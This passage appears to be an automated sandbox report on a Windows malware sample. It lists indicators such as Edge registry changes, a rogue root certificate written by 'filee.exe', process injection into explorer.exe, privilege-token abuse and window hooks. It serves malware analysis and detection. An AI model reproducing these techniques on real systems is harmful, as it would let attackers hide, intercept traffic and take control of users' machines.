Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000e325dc601b794bc94d1bbd1b6460993a930d212fff912463c8607a436ce0c7d98a9da22b20b2b8874590b38ecda119b7d069dc95f21d447c42de616351080f4047466c8d285820ed4bbeaed8c1fb4762df2ef0e0614c6d65aa80	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "326101061"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "325498202"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f063b997a739d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 60f1aa72a539d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify.	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = d97ce175a539d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "326117661"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	filee.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	filee.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5232	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2412	rundll32.exe
2412	rundll32.exe
3076	svchost.exe
3076	svchost.exe
4280	ultramediaburner.tmp
4280	ultramediaburner.tmp
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe
4480	Beferobume.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
388	Process not Found

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
2076	MicrosoftEdgeCP.exe
2076	MicrosoftEdgeCP.exe
2076	MicrosoftEdgeCP.exe
5372	c7ae36fa.exe
4800	powershell.exe
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
5340	explorer.exe
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
4456	explorer.exe
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
4196	explorer.exe
4196	explorer.exe
4196	explorer.exe
4196	explorer.exe
4196	explorer.exe
4196	explorer.exe
388	Process not Found
388	Process not Found
4904	gairbtd
2840	jiirbtd
5340	explorer.exe
5340	explorer.exe
4456	explorer.exe
4456	explorer.exe
4196	explorer.exe
4196	explorer.exe
2076	MicrosoftEdgeCP.exe
2076	MicrosoftEdgeCP.exe
4196	explorer.exe
4196	explorer.exe
5340	explorer.exe
5340	explorer.exe
4456	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeTcbPrivilege	3076	svchost.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2528	JoSetp.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	2412	rundll32.exe
Token: SeDebugPrivilege	3344	Ultra.exe
Token: SeAuditPrivilege	2340	svchost.exe
Token: SeDebugPrivilege	4424	Jezhesixiji.exe
Token: SeDebugPrivilege	4480	Beferobume.exe
Token: SeAssignPrimaryTokenPrivilege	2676	svchost.exe
Token: SeIncreaseQuotaPrivilege	2676	svchost.exe
Token: SeSecurityPrivilege	2676	svchost.exe
Token: SeTakeOwnershipPrivilege	2676	svchost.exe
Token: SeLoadDriverPrivilege	2676	svchost.exe
Token: SeSystemtimePrivilege	2676	svchost.exe
Token: SeBackupPrivilege	2676	svchost.exe
Token: SeRestorePrivilege	2676	svchost.exe
Token: SeShutdownPrivilege	2676	svchost.exe
Token: SeSystemEnvironmentPrivilege	2676	svchost.exe
Token: SeUndockPrivilege	2676	svchost.exe
Token: SeManageVolumePrivilege	2676	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2676	svchost.exe
Token: SeIncreaseQuotaPrivilege	2676	svchost.exe
Token: SeSecurityPrivilege	2676	svchost.exe
Token: SeTakeOwnershipPrivilege	2676	svchost.exe
Token: SeLoadDriverPrivilege	2676	svchost.exe
Token: SeSystemtimePrivilege	2676	svchost.exe
Token: SeBackupPrivilege	2676	svchost.exe
Token: SeRestorePrivilege	2676	svchost.exe
Token: SeShutdownPrivilege	2676	svchost.exe
Token: SeSystemEnvironmentPrivilege	2676	svchost.exe
Token: SeUndockPrivilege	2676	svchost.exe
Token: SeManageVolumePrivilege	2676	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2676	svchost.exe
Token: SeIncreaseQuotaPrivilege	2676	svchost.exe
Token: SeSecurityPrivilege	2676	svchost.exe
Token: SeTakeOwnershipPrivilege	2676	svchost.exe
Token: SeLoadDriverPrivilege	2676	svchost.exe
Token: SeSystemtimePrivilege	2676	svchost.exe
Token: SeBackupPrivilege	2676	svchost.exe
Token: SeRestorePrivilege	2676	svchost.exe
Token: SeShutdownPrivilege	2676	svchost.exe
Token: SeSystemEnvironmentPrivilege	2676	svchost.exe
Token: SeUndockPrivilege	2676	svchost.exe
Token: SeManageVolumePrivilege	2676	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2676	svchost.exe
Token: SeIncreaseQuotaPrivilege	2676	svchost.exe
Token: SeSecurityPrivilege	2676	svchost.exe
Token: SeTakeOwnershipPrivilege	2676	svchost.exe
Token: SeLoadDriverPrivilege	2676	svchost.exe
Token: SeSystemtimePrivilege	2676	svchost.exe
Token: SeBackupPrivilege	2676	svchost.exe
Token: SeRestorePrivilege	2676	svchost.exe
Token: SeShutdownPrivilege	2676	svchost.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
4280	ultramediaburner.tmp
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found
388	Process not Found

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
856	xiuhuali.exe
856	xiuhuali.exe
4980	MicrosoftEdge.exe
2076	MicrosoftEdgeCP.exe
2076	MicrosoftEdgeCP.exe
5352	google-game.exe
